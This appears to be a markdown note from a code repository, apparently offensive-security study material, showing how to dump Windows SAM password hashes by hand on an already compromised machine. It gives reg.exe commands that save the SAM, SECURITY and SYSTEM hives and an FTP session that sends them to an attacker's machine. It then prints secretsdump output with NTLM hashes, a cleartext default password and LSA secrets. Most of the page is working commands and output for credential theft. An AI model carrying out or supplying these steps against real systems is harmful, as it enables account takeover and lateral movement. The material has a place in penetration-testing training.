Skip to content

Latest commit

 

History

History
48 lines (47 loc) · 2.21 KB

manual-hashdump.md

File metadata and controls

48 lines (47 loc) · 2.21 KB
Raw

Window's SAM Hashes

This is similar to the hashdump command in the (frowned-upon-by-OffSec Metasploit Framework).

Get SAM, SECURITY, and SYSTEM

In exploited Windows system, do the following:

C:\> reg.exe save hklm\sam sam
C:\> reg.exe save hklm\security security
C:\> reg.exe save hklm\system system

Then, get these files to your attacker box. E.g.: Using FTP:

ftp> bin
200 TYPE is now 8-bit binary
ftp> put system
200 PORT command successful
ftp> put security
200 PORT command successful
ftp> put sam
200 PORT command successful

The bin command is VERY important and the next step will not work if not used. Next, we run the Impacket Python script, secretsdump.py like so:

Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Target system bootKey: 0x371c6e102028a5b0e79ccc268d721c26
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f53ac7dfad4fe8c3e632e6d3becdccd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:11e102c7f485f3e21f5ca486c7d85b4c:::
kevin:1000:aad3b435b51404eeaad3b435b51404ee:3164f206290117d74e9fa582139828d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:173cf47d45ff85470ccd9c4bd609c518:::
trevelyn:1003:aad3b435b51404eeaad3b435b51404ee:7213b1af7ba9bfea55d6305a0a6686f5:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):r4UBwM8sSx
[*] DPAPI_SYSTEM 
 0000   01 00 00 00 CC 5F BF 2F  58 69 C0 13 E9 00 2B A9   ....._./Xi....+.
 0010   E7 95 6D 7C 68 4B 7C C1  23 E2 DE 6F 48 70 31 8E   ..m|hK|.#..oHp1.
 0020   96 26 83 EC 16 98 BD 9F  ED 01 EE 7C               .&.........|
DPAPI_SYSTEM:01000000cc5fbf2f5869c013e9002ba9e7956d7c684b7cc123e2de6f4870318e962683ec1698bd9fed01ee7c
[*] NL$KM 
 0000   BC 28 86 EE C0 B6 91 0A  8C 2D 84 63 A0 BE 36 B7   .(.......-.c..6.
 0010   56 38 88 99 72 53 44 DC  51 CE F5 51 D1 4E 37 B8   V8..rSD.Q..Q.N7.
 0020   2E 28 23 C5 70 BB 5E EB  13 38 9D 42 8E B1 17 6A   .(#.p.^..8.B...j
 0030   E2 89 4E CF AB 6F 73 CE  1D 0E 8B BA 58 D0 1E 72   ..N..os.....X..r
NL$KM:bc2886eec0b6910a8c2d8463a0be36b756388899725344dc51cef551d14e37b82e2823c570bb5eeb13389d428eb1176ae2894ecfab6f73ce1d0e8bba58d01e72
[*] Cleaning up...